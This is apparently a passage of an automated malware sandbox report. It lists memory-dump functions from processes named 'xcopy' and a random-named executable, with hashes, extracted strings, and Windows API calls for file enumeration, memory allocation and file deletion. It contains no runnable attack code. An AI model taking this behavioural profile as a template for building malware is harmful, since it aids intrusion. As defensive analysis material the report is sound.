                                  • Instruction Fuzzy Hash: 9741E6B6A00308AFDB60DFA4CC84FEFBBFDAF49700F14455AE559A7240D774AA458B60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -$0$6$J$J
                                  • API String ID: 0-3339242485
                                  • Opcode ID: bca155fe529d64cc13e769285eabc5d9fe639c199f01c4cab6108a04398b48d2
                                  • Instruction ID: 1e84542ccfc2dcd8951e9306c3065f775e376d46544f8d5d8ce5faf8d1038fe0
                                  • Opcode Fuzzy Hash: bca155fe529d64cc13e769285eabc5d9fe639c199f01c4cab6108a04398b48d2
                                  • Instruction Fuzzy Hash: A13124B5D10219BBEF10DBA4DD41FFE77B8EF05304F048199E908AB240E7759A458BE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !$G$e$u$w
                                  • API String ID: 0-2067939
                                  • Opcode ID: d4d47ac5da0a6a8e1b4fe6a13439eec53529d80a469418b6084dc7ab115ef377
                                  • Instruction ID: c70d5051a836f21a2dce6a7af02270c344877d73ffe9c517c077e06ec703d335
                                  • Opcode Fuzzy Hash: d4d47ac5da0a6a8e1b4fe6a13439eec53529d80a469418b6084dc7ab115ef377
                                  • Instruction Fuzzy Hash: 66118E10D0D7CED9DB12CBBC88046AEBF715F23224F0883D9D8F56A2D2D2755616C7A6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: b087f1bdb85a367de17b9143e453086e14e1186ed443de26efbd779faf4a6268
                                  • Instruction ID: d74bf2eb6d0009f7030ba3ecd00c44927554c62a13647c6d8686dff4f3645581
                                  • Opcode Fuzzy Hash: b087f1bdb85a367de17b9143e453086e14e1186ed443de26efbd779faf4a6268
                                  • Instruction Fuzzy Hash: 24B1E9B5A00708AFDB64DBA4CC84FEFB7FDAF88700F14855DF619AB240D674AA418B50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o
                                  • API String ID: 0-3662636641
                                  • Opcode ID: 3e06f6bf5b05154aa4d6f3f81e32d05f35ccd35101e69136dcb2e649d692a206
                                  • Instruction ID: 69608a340b1ca8d1a5d639e14adf2b748cc9e857d8717e47f345a41cd00a0436
                                  • Opcode Fuzzy Hash: 3e06f6bf5b05154aa4d6f3f81e32d05f35ccd35101e69136dcb2e649d692a206
                                  • Instruction Fuzzy Hash: 287163B69002187EDF60EB94CD85FEF73BCEF45600F40459AF549AA140EE745B898FA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 986523db24db08602ce3da2bd06796a9fd1b4f18ccc9f97c59f35b6012c2e19a
                                  • Instruction ID: 24319adcd44b89aefbace0246074806c65a381ba6c9be19a5b0070fb91f02186
                                  • Opcode Fuzzy Hash: 986523db24db08602ce3da2bd06796a9fd1b4f18ccc9f97c59f35b6012c2e19a
                                  • Instruction Fuzzy Hash: 68611FB5A00708AFDB64DFA4CC84FEFB7BDAF88704F14855DA619AB244D770AA41CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                  • API String ID: 0-2877786613
                                  • Opcode ID: e3199ae51573058c4a82bfc901ca1bf7425f641c26fa21deecdc88cc5e780de4
                                  • Instruction ID: cc5e7f08a9261fb94a51c1d0c408bfbf8e8ce4efba99fb42d4a11f639184fd05
                                  • Opcode Fuzzy Hash: e3199ae51573058c4a82bfc901ca1bf7425f641c26fa21deecdc88cc5e780de4
                                  • Instruction Fuzzy Hash: AD3161759823587AEB01FBA4CD41FEFB77C9F55600F40404AF6147E280EBB46A0987E6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$h$o
                                  • API String ID: 0-3662636641
                                  • Opcode ID: 5dcc328bfcc5205093f279fc4dccbd32e4bfb6f4f12dc6a64f322674b21d9d7f
                                  • Instruction ID: 779950f2977bb4048d156398c31b80a0eae51d1a20cba4912cd18c006c00c80d
                                  • Opcode Fuzzy Hash: 5dcc328bfcc5205093f279fc4dccbd32e4bfb6f4f12dc6a64f322674b21d9d7f
                                  • Instruction Fuzzy Hash: 0A412FB5E00318BEDFA0EBA4CD45FEF72B8EF45700F44459AA54DA6140EA745B888F92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 841298dc58ba1b87935b714b96ba7b1bc60fbeac3a3ad3b52e2f0b55b16109fa
                                  • Instruction ID: 5c5b6bf731bf2e9c8c9345c463e34f0a0c962ef538179dc2c07860802e80bfd7
                                  • Opcode Fuzzy Hash: 841298dc58ba1b87935b714b96ba7b1bc60fbeac3a3ad3b52e2f0b55b16109fa
                                  • Instruction Fuzzy Hash: 8211EC72900208EFDB14DFA5D884ADEFBB5FF45314F04825DE5099F205E7719545CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $e$k$o
                                  • API String ID: 0-3624523832
                                  • Opcode ID: 5926333e2b35af22c8b89b14bc847cd3211625cfd9b2f8d605b2656816cc7b4d
                                  • Instruction ID: 25005f22b8f98cbf83d74b20d8edf2bb0ac6c24a0a7c70660ee8550c3e62b45f
                                  • Opcode Fuzzy Hash: 5926333e2b35af22c8b89b14bc847cd3211625cfd9b2f8d605b2656816cc7b4d
                                  • Instruction Fuzzy Hash: 880188B290031CABDB14DF95D884ADEF7B9FF44714F048259E9195F201E7719545CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_21_2_38d0000_TsrCaEwNrfOKANGWcsg.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $ma#$$ma#3$3$Ama%$'- 5$ma#3
                                  • API String ID: 0-3979962991
                                  • Opcode ID: 676023505294f6ee252f62c4f33d68d7b2c3320ad8a449cb25ad177d86c099c0
                                  • Instruction ID: 090b521cda1678f23dc396ec7703d1349d8a21227ad22db6123a0ec29ca8f672
                                  • Opcode Fuzzy Hash: 676023505294f6ee252f62c4f33d68d7b2c3320ad8a449cb25ad177d86c099c0
                                  • Instruction Fuzzy Hash: 60F065B4D0120C5ADB05DFA4D984AEEBBB8FF04200F504598DD486F241E3748744CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage: 3.3%
                                  Dynamic/Decrypted Code Coverage: 3.9%
                                  Signature Coverage: 2%
                                  Total number of Nodes: 510
                                  Total number of Limit Nodes: 75
                                  [Rendered execution graph not reproduced; its node/edge data (node id, address, API label, "src->dst" call edges) was emitted here as flattened text. Call-site nodes sit at 02F33DC0-02F5AA70 (the 02F30000 dump, based on PE: false); the nodes labelled LdrInitializeThunk sit at 03922AD0-03924650 (the 038B0000 dump, based on PE: true). API-labelled nodes present in the graph: LdrInitializeThunk, LdrLoadDll, RtlAllocateHeap, RtlFreeHeap, NtAllocateVirtualMemory, NtCreateFile, NtReadFile, NtDeleteFile, NtClose, CreateProcessInternalW, CreateThread, PostThreadMessageW, SetErrorMode, CoInitialize, GetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, Sleep.]

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  [Rendered control-flow graph not reproduced; its block ranges and edges were emitted here as flattened text. The function at 02F393E0 in the 02F30000 dump spans 91 basic blocks (02F393E0-02F39C72) and contains one call edge, to 02F594F0 at 02F39B3A.]
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: j$d$+m$.G$5$5F$?]$?}$G1$H$Nc$W0$Xf$\$^$_$`$`7$`g$mW$nq$oB$t$t?$tP$u$uk$wn$k${
                                  • API String ID: 0-1536851386
                                  • Opcode ID: d2e280d988a36fa30307a7b3729d17d8e6303bfcab3e3188918daa38a9912e39
                                  • Instruction ID: 97d89548ea5992148ebd9548bb897d8a65098251fece701233d462374a37cd80
                                  • Opcode Fuzzy Hash: d2e280d988a36fa30307a7b3729d17d8e6303bfcab3e3188918daa38a9912e39
                                  • Instruction Fuzzy Hash: 8A32BFB0E05229CBEF65CF45C9947EDBBB2BB45348F2081D9C1096B390CBB95A89CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02F4B884
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02F4B8BF
                                  • FindClose.KERNELBASE(?), ref: 02F4B8CA
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 0cbf1fa5584d6a1ec209db0246f8499e24142ef731ca5de30fb36001dd7c5ea9
                                  • Instruction ID: 163b88375f747418f3705a1b8fd77b58ab6b72e1dcaaa1cb9267a004b121dcaa
                                  • Opcode Fuzzy Hash: 0cbf1fa5584d6a1ec209db0246f8499e24142ef731ca5de30fb36001dd7c5ea9
                                  • Instruction Fuzzy Hash: C8315271D00318BBDB20EB64CC89FEF777DAF44748F144458BA08A7181DBB0AA859BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02F57773
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: cf018d6c542dcef03741dd34ea96751def6e419a17db5e379fca68963f422c4a
                                  • Instruction ID: e48009537be1cc5f736bd77cf9ec0d7da1fc498c2e0808d0a60d39aed8e959e0
                                  • Opcode Fuzzy Hash: cf018d6c542dcef03741dd34ea96751def6e419a17db5e379fca68963f422c4a
                                  • Instruction Fuzzy Hash: DC3193B5A11608AFCB14DF99DC80EDFB7B9AF8C354F108219FA19A3240D770A851CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02F578BE
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 67128b11a4b4a6b84c578c6158015fa80bc9538983fac68061dd275e320b4ad3
                                  • Instruction ID: b87b1dedc4b827b5d61cffdcc2424c3e00600df16f12d9e87a7f87e52350f82b
                                  • Opcode Fuzzy Hash: 67128b11a4b4a6b84c578c6158015fa80bc9538983fac68061dd275e320b4ad3
                                  • Instruction Fuzzy Hash: 0C31B8B5A10208AFDB14DF59D881EEFB7B9EF88354F108619FE19A7240D770A851CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(02F412EE,?,02F56717,00000000,00000004,00003000,?,?,?,?,?,02F56717,02F412EE,564CEC83,02F412EE,00000000), ref: 02F57B7D
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 01fa65412ad528fffbacf1f2427499a73a7c78b2a3290bfeb3c302fd5a29c01e
                                  • Instruction ID: f9ce8b3d20b3eeaaa580d4366e615386d5d3fb2c34ad22d7f3c181958a3d7a1e
                                  • Opcode Fuzzy Hash: 01fa65412ad528fffbacf1f2427499a73a7c78b2a3290bfeb3c302fd5a29c01e
                                  • Instruction Fuzzy Hash: 08211BB5A00608ABDB14DF59DC41FEFB7A9EF88350F108609FE19A7240D774A851CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: b71c8c79b0eedf6cd6781f45bab16acb294b7275b4658cc78bb3f1a2ba6faa9a
                                  • Instruction ID: 74b4c37211e34daf6ff92b38f17313486e5e6b09143f969d7ae6d99e42745da9
                                  • Opcode Fuzzy Hash: b71c8c79b0eedf6cd6781f45bab16acb294b7275b4658cc78bb3f1a2ba6faa9a
                                  • Instruction Fuzzy Hash: DB01AD76A00218BBE620EA64CC01FEB77ADDF85350F408509FF59A7280DBB07811CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02F579A7
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 43d2ed2439114ee81b7b232533c9cb5fa2a1d2599db66f1e43638d96395448c1
                                  • Instruction ID: e40d50fefba9701b42b7bdc31af5d45c998b3cc3e5f877f8236016bec842caaa
                                  • Opcode Fuzzy Hash: 43d2ed2439114ee81b7b232533c9cb5fa2a1d2599db66f1e43638d96395448c1
                                  • Instruction Fuzzy Hash: 35E046322002147BC620AA59DC01FDB776DDFCA7A0F108416FA0AAB281C670B9008AE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
